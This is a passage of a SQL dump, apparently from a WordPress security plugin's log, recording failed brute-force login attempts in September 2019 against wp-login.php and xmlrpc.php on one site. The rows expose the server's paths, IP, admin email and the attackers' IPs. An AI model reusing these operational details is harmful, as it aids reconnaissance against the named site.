14:21:07',17740096,19231976,'https://bintara.com.my/wp-login.php',1,0,'139.59.100.255'),(24154,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.100.255\";s:11:\"REMOTE_PORT\";s:5:\"53500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@aVXPgbK7GuRh1kKnhMQAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568643669.1204\";s:12:\"REQUEST_TIME\";s:10:\"1568643669\";}}','notice','2019-09-16 14:21:10','2019-09-16 14:21:09',18256480,19555296,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.100.255'),(24155,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.221.221.133\";s:11:\"REMOTE_PORT\";s:5:\"39550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@ccWCCaIOMm5l5jJFHJAAAARY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568644209.61\";s:12:\"REQUEST_TIME\";s:10:\"1568644209\";}}','notice','2019-09-16 14:30:10','2019-09-16 14:30:09',17742992,19230432,'https://bintara.com.my/wp-login.php',1,0,'103.221.221.133'),(23930,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"37312\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6hMt7nxogXZmwWoWHPsQAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568579890.4119\";s:12:\"REQUEST_TIME\";s:10:\"1568579890\";}}','notice','2019-09-15 20:38:13','2019-09-15 20:38:10',17737768,19227800,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(23929,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"47118\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6ek71rBLb0GV3O7mTAQgAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568579219.2048\";s:12:\"REQUEST_TIME\";s:10:\"1568579219\";}}','notice','2019-09-15 20:27:00','2019-09-15 20:26:59',18255720,19555280,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.211.251'),(23928,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"46684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6ekN7nxogXZmwWoWHOlwAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568579216.6356\";s:12:\"REQUEST_TIME\";s:10:\"1568579216\";}}','notice','2019-09-15 20:26:58','2019-09-15 20:26:57',17738840,19230488,'https://bintara.com.my/wp-login.php',1,0,'148.72.211.251'),(23927,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"52052\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6bld7nxogXZmwWoWHNZAAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568578453.7183\";s:12:\"REQUEST_TIME\";s:10:\"1568578453\";}}','notice','2019-09-15 20:14:14','2019-09-15 20:14:14',18255368,19554128,'https://bintara.com.my/xmlrpc.php',1,0,'217.11.48.148'),(23926,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"51330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6bkd7nxogXZmwWoWHNYwAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568578449.2035\";s:12:\"REQUEST_TIME\";s:10:\"1568578449\";}}','notice','2019-09-15 20:14:12','2019-09-15 20:14:09',17737608,19228400,'https://bintara.com.my/wp-login.php',1,0,'217.11.48.148'),(23925,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"35576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6ZG97nxogXZmwWoWHMdgAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568577820.1027\";s:12:\"REQUEST_TIME\";s:10:\"1568577820\";}}','notice','2019-09-15 20:03:41','2019-09-15 20:03:40',18255368,19554128,'https://bintara.com.my/xmlrpc.php',1,0,'185.84.180.90'),(23924,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"33678\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6ZEmCCaIOMm5l5jJEkTwAAAQY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568577810.2007\";s:12:\"REQUEST_TIME\";s:10:\"1568577810\";}}','notice','2019-09-15 20:03:37','2019-09-15 